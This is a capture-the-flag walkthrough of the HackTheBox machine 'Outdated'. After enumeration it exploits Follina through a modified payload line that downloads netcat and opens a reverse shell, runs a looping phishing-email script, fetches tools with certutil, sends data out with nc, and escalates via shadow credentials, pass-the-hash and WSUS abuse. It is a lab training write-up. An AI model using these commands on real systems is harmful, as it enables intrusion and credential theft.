Outdated

From RCATs

Start with nmap scan

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-30 15:04 MST
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 15:05 (0:00:03 remaining)
Nmap scan report for outdated.htb (10.10.11.175)
Host is up (0.063s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-01 06:04:37Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
|_ssl-date: 2022-12-01T06:05:59+00:00; +8h00m01s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-12-01T06:05:58+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-12-01T06:05:59+00:00; +8h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
|_ssl-date: 2022-12-01T06:05:58+00:00; +8h00m00s from scanner time.
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h00m00s, deviation: 0s, median: 8h00m00s
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-12-01T06:05:22
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.55 seconds

Checked DNS next. With not much luck or anything interesting.

┌──[Target:Outdated🌐IP:10.10.11.175🚀⚔️Attacker:SourMilk📡IP:10.10.14.123🏆Prize:30 points]
└──╼[👾]~/HTB/outdated $ dig ns outdated.htb @10.10.11.175

; <<>> DiG 9.18.9 <<>> ns outdated.htb @10.10.11.175
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42920
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 5

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;outdated.htb.                  IN      NS

;; ANSWER SECTION:
outdated.htb.           3600    IN      NS      dc.outdated.htb.

;; ADDITIONAL SECTION:
dc.outdated.htb.        3600    IN      A       172.16.20.1
dc.outdated.htb.        3600    IN      A       10.10.11.175
dc.outdated.htb.        3600    IN      AAAA    dead:beef::50
dc.outdated.htb.        3600    IN      AAAA    dead:beef::e907:3922:993:9c2d

;; Query time: 55 msec
;; SERVER: 10.10.11.175#53(10.10.11.175) (UDP)
;; WHEN: Wed Nov 30 15:08:20 MST 2022
;; MSG SIZE  rcvd: 146
──[Target:Outdated🌐IP:10.10.11.175🚀⚔️Attacker:SourMilk📡IP:10.10.14.123🏆Prize:30 points]
└──╼[👾]~/HTB/outdated $ dig any outdated.htb @dc.outdated.htb

; <<>> DiG 9.18.9 <<>> any outdated.htb @dc.outdated.htb
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14727
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 5

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;outdated.htb.                  IN      ANY

;; ANSWER SECTION:
outdated.htb.           600     IN      A       10.10.11.175
outdated.htb.           600     IN      A       172.16.20.1
outdated.htb.           3600    IN      NS      dc.outdated.htb.
outdated.htb.           3600    IN      SOA     dc.outdated.htb. hostmaster.outdated.htb. 274 900 600 86400 3600
outdated.htb.           600     IN      AAAA    dead:beef::50
outdated.htb.           600     IN      AAAA    dead:beef::e907:3922:993:9c2d

;; ADDITIONAL SECTION:
dc.outdated.htb.        1200    IN      A       172.16.20.1
dc.outdated.htb.        1200    IN      A       10.10.11.175
dc.outdated.htb.        1200    IN      AAAA    dead:beef::e907:3922:993:9c2d
dc.outdated.htb.        1200    IN      AAAA    dead:beef::50

;; Query time: 61 msec
;; SERVER: 10.10.11.175#53(dc.outdated.htb) (TCP)
;; WHEN: Wed Nov 30 15:09:21 MST 2022
;; MSG SIZE  rcvd: 281

SMB up next

┌──[Target:Outdated🌐IP:10.10.11.175🚀⚔️Attacker:SourMilk📡IP:10.10.14.123🏆Prize:30 points]
└──╼[👾]~/HTB/outdated $ smbclient -N -L //10.10.11.175
Can't load /etc/samba/smb.conf - run testparm to debug it

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Shares          Disk
        SYSVOL          Disk      Logon server share
        UpdateServicesPackages Disk      A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
        WsusContent     Disk      A network share to be used by Local Publishing to place published content on this WSUS system.
        WSUSTemp        Disk      A network share used by Local Publishing from a Remote WSUS Console Instance.
SMB1 disabled -- no workgroup available

Hop on /Shares and grab NOC_Reminder

┌──[Target:Outdated🌐IP:10.10.11.175🚀⚔️Attacker:SourMilk📡IP:10.10.14.123🏆Prize:30 points]
└──╼[👾]~/HTB/outdated $ smbclient //10.10.11.175/Shares
Can't load /etc/samba/smb.conf - run testparm to debug it
Password for [WORKGROUP\sourmilk]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jun 20 09:01:33 2022
  ..                                  D        0  Mon Jun 20 09:01:33 2022
  NOC_Reminder.pdf                   AR   106977  Mon Jun 20 09:00:32 2022

                9116415 blocks of size 4096. 2107961 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (263.1 KiloBytes/sec) (average 263.1 KiloBytes/sec)
smb: \> exit


NOC_Reminder shows CVE-2022-30190 also a nice juicy email. That well... somtimes likes to click links.
Grab follina. Change line 111 in follina.py

    command = args.command
    if args.reverse:
        command = f"""Invoke-WebRequest http://yourIP/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe YourIP {args.reverse}"""

Start follina with your ip on port 80 with a reverse shell on 9001

sudo python3 follina.py --interface 10.10.16.6 --port 80 -r 9001

Copy nc64.exe to created /tmp/asdasd/www/

#yttnp8ga is a tmp folder created by follina, yours will be different
sudo cp nc64.exe /tmp/yttnp8ga/www/nc64.exe

Send Email or use python script below

swaks --to itsupport@outdated.htb --from admin@outdate.htb --server mail.outdated.htb --header "Subject: foo" --body “http://10.10.16.6/index.html”

I used this python script to keep emailing the server with random subject and from adress. Keep script running until a shell pops.

import time
import subprocess
import random
import string

# Prompt the user for the required arguments
body = input("Enter the body for the email http://<ip>/index.html: ")

# Generate random strings for arg3, arg4, and arg5
arg3 = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
arg4 = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
arg5 = ''.join(random.choices(string.ascii_letters + string.digits, k=10))

while True:
  try:
    # Construct the swaks command using the user-specified and generated arguments
    command = f'swaks --to itsupport@outdated.htb --from {arg3}@{arg4} --server mail.outdated.htb --header "Subject: {arg5}" --body "{body}"'

    # Run the swaks command
    subprocess.run(command, shell=True)

    # Pause for 10 seconds before sending the next email
    time.sleep(10)
  except KeyboardInterrupt:
    # If the user presses CTRL + C, exit the program
    print("Exiting program")
    break

Shell!

[👾]~/HTB/outdated/msdt-follina $ sudo python3 follina.py --interface 10.10.16.4 --port 80 -r 9001
[sudo] password for sourmilk:
[+] copied staging doc /tmp/4y4o9k1n
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 9001'
Listening on 0.0.0.0 9001
Connection received on 10.129.35.230 49880
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.

C:\Users\btables\AppData\Local\Temp\SDIAG_96ab4662-d445-4061-8e53-739df54f843c>


No flag on desktop. Net Users

C:\Users\btables\Desktop>net users /domain
net users /domain
The request will be processed at a domain controller for domain outdated.htb.


User accounts for \\DC.outdated.htb

-------------------------------------------------------------------------------
Administrator            btables                  Guest
krbtgt                   sflowers
The command completed successfully.

Grab WINPEAS and run

certutil.exe -urlcache -f http://10.10.16.6:8000/winPEASany.exe winPEASany.exe

WSUS shows vulnerable

Checking WSUS
  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
    WSUS is using http: http://wsus.outdated.htb:8530
 You can test https://github.com/pimps/wsuxploit to escalate privileges
    And UseWUServer is equals to 1, so it is vulnerable!

Sharphound Stuff

#Download SharpHound
certutil.exe -urlcache -f http://10.10.16.6:8000/SharpHound.exe sh.exe
#Run SharpHound and zip results
sh.exe -c ALL --zipfilename sourmilk.zip
#Send the file back
nc.exe 10.10.16.6 4443 < 20221204221028_sourmilk.zip

Bloodhound shows that user btables belongs to the group staff and it has the ability to AddCredentialLink to the user sflowers .

> certutil.exe -urlcache -f http://10.10.16.6:8000/Whisker.exe Whisker.exe
> certutil.exe -urlcache -f http://10.10.16.6:8000/Rubeus.exe Rubeus.exe
> Whisker.exe add /target:sflowers
...<Snip>...
Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"......." /domain:outdated.htb /dc:dc.outdated.htb /getcredentials /show

> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"..........." /domain:outdated.htb /dc:dc.outdated.htb /getcredentials /show
...<snip>...
       NTLM              : 1FCDB1F6......2BDA14DB5

Log in with evilwinrm

evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F601......B2BDA14DB5

Upload Sharphound again

*Evil-WinRM* PS C:\Users\sflowers\Documents> upload /home/sourmilk/HTB/outdated/SharpHound.exe

Sharphound shows WSUS running though http server. Read all the info below and priv esc! Introducing SharpWSUS WSUS PayLoad All the Things SharpWSUS Github More WSUS Information

Locate the WSUS server:
    SharpWSUS.exe locate

Inspect the WSUS server, enumerating clients, servers and existing groups:
    SharpWSUS.exe inspect

Create an update (NOTE: The payload has to be a windows signed binary):
    SharpWSUS.exe create /payload:[File location] /args:[Args for payload] </title:[Update title] /date:[YYYY-MM-DD] /kb:[KB on update] /rating:[Rating of update] /msrc:[MSRC] /description:[description] /url:[url]>

Approve an update:
    SharpWSUS.exe approve /updateid:[UpdateGUID] /computername:[Computer to target] </groupname:[Group for computer to be added too] /approver:[Name of approver]>

Check status of an update:
    SharpWSUS.exe check /updateid:[UpdateGUID] /computername:[Target FQDN]

Delete update and clean up groups added:
    SharpWSUS.exe delete /updateid:[UpdateGUID] /computername:[Target FQDN] </groupname:[GroupName] /keepgroup>

Sorry for the bad notes. This box really took it out on me.